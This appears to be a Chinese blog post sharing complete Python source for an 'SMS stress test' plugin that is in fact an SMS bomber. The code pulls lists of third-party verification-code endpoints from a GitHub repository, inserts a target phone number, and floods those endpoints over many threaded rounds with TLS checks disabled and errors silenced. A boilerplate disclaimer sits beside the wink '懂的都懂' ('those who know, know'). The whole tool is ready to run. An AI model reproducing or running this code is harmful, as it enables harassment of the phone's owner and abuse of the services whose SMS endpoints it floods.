乐于分享
好东西不私藏

短信测压V1.2版本插件源码

短信测压V1.2版本插件源码

🚀 脚本名称:短信测压V1.2版本

💻 语言:Python 3.1+

————————————

📝 功能介绍

————————————

短信测压,懂的都懂

本源码已经无多少bug,可以完美运行,但测压效果根据地区的不同,可能无法达到想要的预期,这个请自行查找修改

————————————

————————————

⚠️ 免责声明

————————————

1.本公众号分享的源码及程序仅供学习交流与技术研究之用,严禁用于任何商业或非法用途。

2.本脚本按“现状”提供,不提供任何形式的明示或暗示担保。运行环境差异可能导致意外结果,请在测试环境中先行验证

3.若使用者因参考或运行本文代码造成数据丢失、系统故障或其他损失,本人及本公众号不承担任何法律责任。

4.如涉及第三方API或网站,请遵守其对应平台的 robots.txt协议及相关服务条款。

5.最终解释权归本公众号所有。

合规使用:本代码仅为技术演示。请勿高频请求目标服务器,避免对其造成负担,否则可能面临IP封禁甚至法律风险。

账号安全:请勿将包含个人Token、Cookie或密码的代码直接上传至公开仓库,由此导致的账号被盗责任自负。

禁止滥用:严禁利用本脚本进行网络攻击、数据窃取或任何违反《网络安全法》的行为。

风险自担:一旦运行本程序,即视为您已了解并同意自行承担所有风险。作者不对任何直接或间接损害负责。

————————————

📸 效果预览

————————————

————————————

📄 核心源码

————————————

# encoding=utf8import jsonimport loggingimport osimport pathlibimport sysimport timeimport httpximport threadingimport asyncioimport copyfrom concurrent.futures import ThreadPoolExecutor, as_completedfrom typing import ListTupleDictAnyUnionOptionalfrom httpx import Limits# 抑制httpx的INFO级日志httpx_logger = logging.getLogger("httpx")httpx_logger.setLevel(logging.WARNING)# 日志配置 - 设置为WARNING级别以减少输出logging.basicConfig(    level=logging.WARNING,  # 改为WARNING级别    format='%(asctime)s - %(levelname)s - %(message)s',    handlers=[logging.StreamHandler()])logger = logging.getLogger('SMS_Bomber')# 应用路径 - 修复 __file__ 未定义问题if getattr(sys, 'frozen'False):    # 打包后的可执行文件路径    APP_PATH = os.path.dirname(sys.executable)else:    # 脚本运行时的路径    try:        APP_PATH = os.path.dirname(os.path.abspath(__file__))    except NameError:        # 交互式环境或其他特殊情况        APP_PATH = os.path.dirname(os.path.abspath(sys.argv[0]))# 默认配置DEFAULT_CONFIG = {    "thread"64,       # 线程数    "frequency"60,     # 轮次(总执行次数)    "interval"60       # 轮次间隔(秒)}# 全局状态管理class BombingState:    def __init__(self):        self.active = False        self.paused = False        self.stopped = False        self.phone = ""        self.frequency = DEFAULT_CONFIG["frequency"]        self.interval = DEFAULT_CONFIG["interval"]        self.lock = threading.Lock()        self.total_count = 0   # 总请求次数        self.success_count = 0 # 成功次数        self.fail_count = 0    # 失败次数        self.round = 0state = BombingState()# API类定义(不使用Pydantic)class API:    """处理自定义 API 数据"""    def __init__(self, desc: str = "Default", url: str = "", method: str = "GET"                 header: Optional[Union[strdict]] = None, data: Optional[Union[strdict]] = None):        self.desc = desc        self.url = url        self.method = method        self.header = header        self.data = data    def replace_data(self, content: Union[strdict], phone: str) -> Union[strdict]:        """替换内容中的占位符"""        if not phone:            return content        # 统一转换成 str 再替换        if isinstance(content, dict):            # 如果是字典,递归处理每个值            return {k: self.replace_data(v, phone) for k, v in content.items()}        elif isinstance(content, str):            # 替换占位符            content = content.replace("[phone]", phone)            content = content.replace("[timestamp]"self.timestamp_new())            return content        return content    def timestamp_new(self) -> str:        """返回整数字符串时间戳"""        from datetime import datetime        return str(int(datetime.now().timestamp()))    def handle_API(self, phone: str = None) -> 'API':        """传入手机号处理 API"""        # 创建副本避免修改原始对象        api_copy = copy.deepcopy(self)        # 处理header        if api_copy.header is None:            api_copy.header = default_header_user_agent()        else:            api_copy.header = self.replace_data(api_copy.header, phone)            # 确保header是字典            if isinstance(api_copy.header, str):                try:                    api_copy.header = json.loads(api_copy.header)                except:                    api_copy.header = {"User-Agent": api_copy.header}        # 确保有Referer        if isinstance(api_copy.header, dictand not any(k.lower() == 'referer' for k in api_copy.header):            api_copy.header['Referer'] = api_copy.url        # 处理data        if api_copy.data is not None:            api_copy.data = self.replace_data(api_copy.data, phone)            # 尝试解析JSON            if isinstance(api_copy.data, str):                try:                    api_copy.data = json.loads(api_copy.data)                except:                    pass        # 处理URL        api_copy.url = self.replace_data(api_copy.url, phone)        return api_copy# 默认请求头def default_header_user_agent() -> Dict[strstr]:    return {        "User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",        "Accept""*/*",        "Connection""keep-alive"    }# 加载API配置def load_apis() -> Tuple[List[API], List[API]]:    try:        json_path = pathlib.Path(APP_PATH, 'api.json')        if not json_path.exists():            raise FileNotFoundError("api.json not found")        with open(json_path, "r", encoding="utf8"as f:            apis_data = json.loads(f.read())            apis = []            for data in apis_data:                # 处理可能的额外字段                desc = data.get("desc""Default")                url = data.get("url""")                method = data.get("method""GET")                header = data.get("header"None)                data_field = data.get("data"None)                apis.append(API(desc=desc, url=url, method=method, header=header, data=data_field))        print(f"api.json 加载完成 接口数:{len(apis)}")        getapi_path = pathlib.Path(APP_PATH, 'GETAPI.json')        if not getapi_path.exists():            raise FileNotFoundError("GETAPI.json not found")        with open(getapi_path, "r", encoding="utf8"as f:            get_apis_data = json.loads(f.read())            # 将字符串URL转换为API对象            get_apis = []            for item in get_apis_data:                if isinstance(item, str):                    get_apis.append(API(url=item, method="GET"))                elif isinstance(item, dict):                    desc = item.get("desc""Default")                    url = item.get("url""")                    method = item.get("method""GET")                    header = item.get("header"None)                    data_field = item.get("data"None)                    get_apis.append(API(desc=desc, url=url, method=method, header=header, data=data_field))        print(f"GETAPI.json 加载完成 接口数:{len(get_apis)}")        return apis, get_apis    except Exception as e:        # 静默处理错误,不输出日志        print("正在尝试更新API配置...")        update_apis()        return load_apis()# 从GitHub更新API配置def update_apis():    base_url = "https://raw.githubusercontent.com/iqcwl/iqcwl/master"    files = {        "GETAPI.json"f"{base_url}/GETAPI.json",        "api.json"f"{base_url}/api.json"    }    try:        with httpx.Client(verify=False, timeout=10as client:            for filename, url in files.items():                response = client.get(url, headers=default_header_user_agent())                response.raise_for_status()                with open(pathlib.Path(APP_PATH, filename), "w", encoding="utf8"as f:                    f.write(response.text)        print("API配置更新成功!")    except Exception:        # 静默处理错误,不输出日志        pass# 验证手机号格式def validate_phone(phone: str) -> bool:    return phone.isdigit() and len(phone) == 11# 请求的方法def reqAPI(api: API, client: httpx.Client) -> httpx.Response:    """发送API请求"""    # 处理API    processed_api = api.handle_API(state.phone if state.active else "")    headers = processed_api.header if isinstance(processed_api.header, dictelse default_header_user_agent()    if isinstance(processed_api.data, dict):        resp = client.request(            method=processed_api.method.upper(),             json=processed_api.data,            headers=headers,             url=processed_api.url,             timeout=10        )    else:        data = processed_api.data if processed_api.data else None        resp = client.request(            method=processed_api.method.upper(),             data=data,            headers=headers,             url=processed_api.url,             timeout=10        )    return resp# 请求接口方法 - 移除所有错误日志def reqFunc(api: Union[API, str], phone: str) -> bool:    """请求接口方法"""    try:        with httpx.Client(headers=default_header_user_agent(), verify=False, timeout=10as client:            if isinstance(api, API):                # 处理API                processed_api = api.handle_API(phone)                resp = reqAPI(processed_api, client)                return 200 <= resp.status_code < 400            else:                # 处理字符串URL                url = api.replace("{phone}", phone).replace("[phone]", phone)                url = url.replace(" """).replace('\n''').replace('\r''')                resp = client.get(url=url, headers=default_header_user_agent(), timeout=10)                return 200 <= resp.status_code < 400    except:        # 静默处理所有异常,不输出日志        return False# 异步请求方法 - 移除所有错误日志async def asyncReqs(src: Union[API, str], phone: str, semaphore: asyncio.Semaphore) -> Optional[httpx.Response]:    """异步请求方法"""    async with semaphore:        try:            async with httpx.AsyncClient(                limits=Limits(max_connections=1000, max_keepalive_connections=2000),                headers=default_header_user_agent(),                verify=False,                timeout=10            ) as client:                if isinstance(src, API):                    # 处理API                    processed_api = src.handle_API(phone)                    if isinstance(processed_api.data, dict):                        r = await client.request(                            method=processed_api.method.upper(),                             json=processed_api.data,                            headers=processed_api.header if isinstance(processed_api.header, dictelse default_header_user_agent(),                            url=processed_api.url                        )                    else:                        data = processed_api.data if processed_api.data else None                        r = await client.request(                            method=processed_api.method.upper(),                             data=data,                            headers=processed_api.header if isinstance(processed_api.header, dictelse default_header_user_agent(),                            url=processed_api.url                        )                else:                    # 处理字符串URL                    url = src.replace("{phone}", phone).replace("[phone]", phone)                    url = url.replace(" """).replace('\n''').replace('\r''')                    r = await client.get(url=url, headers=default_header_user_agent())                return r        except:            # 静默处理所有异常,不输出日志            return None# 发送请求 - 移除错误日志def send_request(api: Union[API, Dictstr], phone: str) -> Tuple[boolint]:    """发送请求并返回结果"""    try:        # 处理不同类型的API输入        if isinstance(api, dict):            # 如果是字典,转换为API对象            api_obj = API(                desc=api.get("desc""Default"),                url=api.get("url"""),                method=api.get("method""GET"),                header=api.get("header"None),                data=api.get("data"None)            )            success = reqFunc(api_obj, phone)            return success, 200 if success else 0        elif isinstance(api, str):            # 如果是字符串,直接使用            success = reqFunc(api, phone)            return success, 200 if success else 0        else:            # 否则是API对象            success = reqFunc(api, phone)            return success, 200 if success else 0    except:        # 静默处理所有异常,不输出日志        return False0# 执行单轮轰炸def run_bombing_round(apis: List[Union[API, Dictstr]], phone: str, round_num: int, total_rounds: int) -> Tuple[intint]:    """执行单轮轰炸"""    total_apis = len(apis)    print(f"===== 第 {round_num}/{total_rounds} 轮轰炸开始 =====")    print(f"本轮计划发送 {total_apis} 次请求")    success_count = 0    fail_count = 0    with ThreadPoolExecutor(max_workers=min(DEFAULT_CONFIG["thread"], total_apis)) as executor:        futures = [executor.submit(send_request, api, phone) for api in apis]        for future in as_completed(futures):            # 检查暂停/停止状态            with state.lock:                if state.stopped:                    break                if state.paused:                    print("轰炸已暂停,等待恢复...")                    while state.paused and not state.stopped:                        time.sleep(0.5)                    if state.stopped:                        break            try:                success, status_code = future.result()                with state.lock:                    state.total_count += 1                    if success:                        success_count += 1                        state.success_count += 1                    else:                        fail_count += 1                        state.fail_count += 1                    # 每10次请求打印一次实时累计                    if state.total_count % 10 == 0:                        print(f"实时累计发送: 总计 {state.total_count} 次请求, "                              f"成功 {state.success_count} 次, 失败 {state.fail_count} 次")            except:                with state.lock:                    state.total_count += 1                    state.fail_count += 1                    fail_count += 1                    # 每10次请求打印一次实时累计                    if state.total_count % 10 == 0:                        print(f"实时累计发送: 总计 {state.total_count} 次请求, "                              f"成功 {state.success_count} 次, 失败 {state.fail_count} 次")    print(f"===== 第 {round_num} 轮轰炸完成 =====")    print(f"本轮结果: 成功 {success_count} 次, 失败 {fail_count} 次")    print(f"累计总发送: 成功 {state.success_count} 次, 失败 {state.fail_count} 次, 总计 {state.total_count} 次")    return success_count, fail_count# 轰炸任务主函数def bombing_task(phone: str, frequency: int, interval: int):    """轰炸任务主函数"""    global state    with state.lock:        state.active = True        state.paused = False        state.stopped = False        state.phone = phone        state.frequency = frequency        state.interval = interval        state.total_count = 0        state.success_count = 0        state.fail_count = 0        state.round = 0    print(f"轰炸任务启动! 目标: {phone}, 轮数: {frequency}, 间隔: {interval}秒")    try:        apis, get_apis = load_apis()        all_apis = apis + get_apis        total_apis = len(all_apis)        print(f"总共加载 {total_apis} 个API接口")        for round_num in range(1, frequency + 1):            with state.lock:                if state.stopped:                    print("轰炸任务已被用户终止")                    break                state.round = round_num            run_bombing_round(all_apis, phone, round_num, frequency)            if round_num < frequency:                with state.lock:                    if state.stopped:                        break                    if not state.paused:                        print(f"等待 {interval} 秒后开始下一轮...")                        # 分段等待以便及时响应停止/暂停                        for _ in range(interval):                            if state.stopped or state.paused:                                break                            time.sleep(1)    except:        # 静默处理所有异常,不输出日志        pass    finally:        with state.lock:            state.active = False            state.paused = False        print(f"轰炸任务结束! 总计发送: 成功 {state.success_count} 次, 失败 {state.fail_count} 次, 总计 {state.total_count} 次")# 启动轰炸def start_bombing(phone: str, frequency: int = None, interval: int = None):    """启动轰炸任务"""    with state.lock:        if state.active:            print("已有轰炸任务正在运行")            return        if not validate_phone(phone):            print("手机号格式错误,请输入11位数字")            return        freq = frequency if frequency is not None else DEFAULT_CONFIG["frequency"]        inter = interval if interval is not None else DEFAULT_CONFIG["interval"]    # 在新线程中运行轰炸任务    threading.Thread(target=bombing_task, args=(phone, freq, inter), daemon=True).start()# 暂停轰炸def pause_bombing():    """暂停轰炸任务"""    with state.lock:        if not state.active:            print("没有正在运行的轰炸任务")            return        if state.paused:            print("轰炸已经处于暂停状态")            return        state.paused = True    print("轰炸已暂停")# 恢复轰炸def resume_bombing():    """恢复轰炸任务"""    with state.lock:        if not state.active:            print("没有正在运行的轰炸任务")            return        if not state.paused:            print("轰炸未处于暂停状态")            return        state.paused = False    print("轰炸已恢复")# 停止轰炸def stop_bombing():    """停止轰炸任务"""    with state.lock:        if not state.active:            print("没有正在运行的轰炸任务")            return        state.stopped = True        state.paused = False    print("轰炸已停止")# 查看状态def status_bombing():    """查看轰炸状态"""    with state.lock:        if not state.active:            print("当前没有轰炸任务运行")            return        status = "运行中" if not state.paused else "已暂停"        print(f"轰炸状态: {status}")        print(f"目标手机号: {state.phone}")        print(f"当前轮次: {state.round}/{state.frequency}")        print(f"累计发送: 总计 {state.total_count} 次请求")        print(f"          成功: {state.success_count} 次")        print(f"          失败: {state.fail_count} 次")        print(f"轮次间隔: {state.interval} 秒")# 命令处理函数def dxhz_main(terminal, *args):    """命令处理函数"""    if len(args) == 0:        print("可用命令:")        print("  dxhz start <手机号> [次数] [间隔] - 启动轰炸")        print("  dxhz pause - 暂停轰炸")        print("  dxhz resume - 恢复轰炸")        print("  dxhz stop - 停止轰炸")        print("  dxhz status - 查看状态")        return    cmd = args[0].lower()    if cmd == "start":        if len(args) < 2:            print("缺少手机号参数")            return        phone = args[1]        try:            frequency = int(args[2]) if len(args) > 2 else None            interval = int(args[3]) if len(args) > 3 else None        except ValueError:            print("次数和间隔必须是整数")            return        start_bombing(phone, frequency, interval)    elif cmd == "pause":        pause_bombing()    elif cmd == "resume":        resume_bombing()    elif cmd == "stop":        stop_bombing()    elif cmd == "status":        status_bombing()    else:        print(f"未知命令: {cmd}")def register_commands():    """注册命令"""    return {        "dxhz": dxhz_main,    }

本源码已开源,可随意修改使用